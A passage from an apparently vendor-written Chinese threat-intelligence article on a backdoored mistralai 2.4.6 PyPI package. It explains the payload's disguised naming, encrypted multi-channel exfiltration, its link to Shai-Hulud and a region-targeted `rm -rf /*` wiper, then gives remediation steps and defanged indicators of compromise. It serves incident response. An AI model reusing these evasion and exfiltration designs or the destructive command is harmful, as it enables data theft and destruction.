25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">巧妙的入口设计。</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 攻击者不在包里放木马文件，不在依赖里做手脚，只在 import 入口塞了不到 30 行代码。这 30 行代码本身没有窃密、没有破坏，唯一做的事情就是下载另一个程序——静态扫描极难判定为恶意。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">巧妙的伪装策略。</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">远控文件名仿 HuggingFace transformers，持久化服务名仿 PostgreSQL 监控——两个层面的命名全都选在了 AI/ML 开发者最熟悉、最不会起疑心的词汇上。而包本身是正版 SDK 遭入侵后植入后门，利用用户对官方包的信任来绕过安检。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">巧妙的外传工程。</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">数据经过 gzip 压缩、AES-256 随机密钥加密、RSA-4096 公钥封装的完整加密封装，即使传输被截获也无法解密。外传通道设了三层容错：主 C2 → GitHub 签名 commit 动态发现备用 C2 → 利用受害者自己的 GitHub Token 上传，每一步都有 Plan B。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" data-pm-slice="3 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:null,&#34;id&#34;:&#34;docs-internal-guid-b3db9aa5-7fff-2cd5-17d7-34d592cccd7d&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">巧妙的双轨作战。</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> Shai-Hulud (TypeScript) 和 transformers.pyz (Python) 两个恶意框架使用了同一把 4096-bit RSA 公钥，这是关联两个样本的核心技术证据——同一私钥持有者才能解密两套框架窃取的数据。两个框架在采集模块、加密流程、俄语规避等设计上呈现高度相似的工程思维，但各自侧重点不同：Shai-Hulud 侧重窃密和 NPM 投毒扩散，`transformers.pyz` 侧重窃密和区域破坏，覆盖了两种攻击场景和两类包生态。结合 Shai-Hulud 已知具备的 CI/CD 凭据滥用能力与本次样本的官方发布形态，`mistralai-2.4.6` 很可能是这套双轨作战体系下的直接产物。</span></span></b></b></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">极端的区域破坏。</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 这是本案例最不寻常的地方。供应链投毒案件通常以窃密或勒索为目的，但这次攻击同时携带了一个 1/6 概率触发的 `rm -rf /*` 擦除器，且目标区域精准锁定以色列和伊朗，同时主动规避俄语环境。这种&#34;窃密 + 破坏 + 区域选择&#34;的三合一模式在当前的供应链攻击案例库中十分罕见。</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">建议:</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">1.</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">若曾在 Linux 环境中安装过 mistralai==2.4.6，请立即将该主机断网，按&#34;已沦陷&#34;级别进行处置。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">2.</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">轮换该主机上所有可接触的凭据：API Key、云访问密钥(AWS/Azure/GCP)、CI/CD Token、SSH 私钥、密码管理器主密码、数据库密码。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">3. </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">检查主机上是否存在以下文件：/tmp/transformers.pyz、/usr/bin/pgmonitor.py 或 ~/.local/bin/pgmonitor.py、RunForCover.mp3。若存在，立即保全取证并隔离主机。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">4.</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">执行 systemctl status pgsql-monitor.service 和 systemctl --user status pgsql-monitor.service，检查是否有恶意持久化服务在运行。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">5.</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在出网防火墙上阻断 IP 83[.]142[.]209[.]194 的所有连接。在日志/SIEM 中回溯相关 IOC。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">6.</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">对受影响的容器或虚拟机执行完整重建，不要仅删除恶意文件后继续使用。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">7.</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">排查内部 PyPI 镜像和制品库是否缓存了该恶意版本，防止横向污染。</span></span></p><h1 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">IOC</span></span></h1><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 16px;font-weight: bold;">IP</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">83[.]142[.]209[.]194</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 16px;font-weight: bold;">URL</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">https[:]//83[.]142[.]209[.]194/transformers.pyz </span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">https[:]//83[.]142[.]209[.]194/v1/models </span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">https[:]//83[.]142[.]209[.]194/v1/weights </span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">https[:]//83[.]142[.]209[.]194/audio.mp3</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">恶意依赖</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">mistralai==2.4.6</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">恶意文件</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">filename: mistralai-2.4.6--6dbaa43bf2f3.tgz</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">MD5: 94dbce1e6dd19886a253a1c5fc0abbb0</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">SHA1: d4583b83b8213add7558ba568b287e65d5a06d47</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> SHA256: 6dbaa43bf2f3c0d3cddbca74967e952da563fb974c1ef9d4ecbb2e58e41fe81b</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">filename: transformers.pyz</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">SHA256: 5245eb032e336b85cff0dbb3450d591826bf2ef214fd30d7eba1a763664e151b</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">本文由 SlowMist 威胁情报团队结合 MistEye 威胁情报系统、SlowMist Agent AI驱动分析编写，有任何问题欢迎咨询反馈。</span></span></p></b></b></b></b></p></b></b></b></b></b></b></p><div style="white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);color: rgb(160, 160, 160);font-size: 16px;margin-bottom: 0px;"><div style="padding-right: 10px;padding-left: 10px;font-size: 15px;line-height: 2;"><div style="letter-spacing: 0.544px;font-size: 16px;"><div style="margin-top: 10px;margin-bottom: 10px;text-align: left;"><div style="display: inline-block;width: 657.014px;vertical-align: top;border-bottom: 1px dashed rgb(160, 160, 160);border-bottom-right-radius: 0px;border-right: 1px dashed rgb(160, 160, 160);border-top-right-radius: 0px;border-left-width: 0px;"><div powered-by="xiumi.us"><div style="padding-right: 10px;padding-left: 10px;display: inline-block;border-style: solid;border-width: 1px 0px 0px 10px;box-shadow: rgb(0, 0, 0) 0px 0px 0px;border-color: rgb(54, 53, 53);border-radius: 0px;width: 629.769px;"><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">往期回顾</span></strong></span></p></div></div><div powered-by="xiumi.us"><div style="text-align: center;"><div style="padding: 10px 20px;display: inline-block;width: 656.019px;vertical-align: top;"><div style="margin-top: 8px;margin-bottom: 8px;"><div style="font-size: 14px;color: rgb(62, 62, 62);text-align: left;"><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504946&amp;idx=1&amp;sn=7904df2118a2c618557db8bdd810f2b6&amp;scene=21#wechat_redirect" textvalue="被黑分析 | ShapeShift FOX Colony 授权信任链缺陷" data-itemshowtype="0" linktype="text" data-linktype="2">被黑分析 | ShapeShift FOX Colony 授权信任链缺陷</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504936&amp;idx=1&amp;sn=8a8f48e910d76f27242fb43e14c45590&amp;scene=21#wechat_redirect" textvalue="Shai-Hulud 恶意软件深度剖析：开源即失控 ？" data-itemshowtype="0" linktype="text" data-linktype="2">Shai-Hulud 恶意软件深度剖析：开源即失控 ？</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504920&amp;idx=1&amp;sn=6452ec12fb825b3a0b91ca5be8f009d8&amp;scene=21#wechat_redirect" textvalue="MistEye 安全前置闸门正式发布，筑牢 AI Agent 前置检测防线" data-itemshowtype="0" linktype="text" data-linktype="2">MistEye 安全前置闸门正式发布，筑牢 AI Agent 前置检测防线</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504920&amp;idx=2&amp;sn=476c39eb63c7323cc18604a3ccc5d487&amp;scene=21#wechat_redirect" textvalue="威胁情报｜仿冒 TronLink 的 Chrome 扩展钓鱼攻击分析" data-itemshowtype="0" linktype="text" data-linktype="2">威胁情报｜仿冒 TronLink 的 Chrome 扩展钓鱼攻击分析</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504886&amp;idx=1&amp;sn=6327c2cd38ad036a84e468f938309eb4&amp;scene=21#wechat_redirect" textvalue="慢雾｜RWA 智能合约安全审计服务正式推出" data-itemshowtype="0" linktype="text" data-linktype="2">慢雾｜RWA 智能合约安全审计服务正式推出</a></span></p></div></div></div></div></div></div></div></div></div></div><p style="white-space: normal;text-align: center;margin-bottom: 0px;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="3.9814814814814814" data-s="300,640" data-type="png" data-w="1080" style="letter-spacing: 0.578px;text-align: center;white-space: normal;width: 558px;pointer-events: initial;" data-croporisrc="https://mmbiz.qpic.cn/mmbiz_png/8z8bibAexaCLqYqc9l9poJTcO8JBsibl6nSSJoiaasoqFToYClTV5oAl2oE6IcqhNsiciagmyhOAsRCrdxdrOKqxpZicVQqlu0WrcOb5vDfKMGsSc/0?wx_fmt=png&amp;from=appmsg" data-cropselx2="558" data-cropsely2="2222" data-imgfileid="100021118" 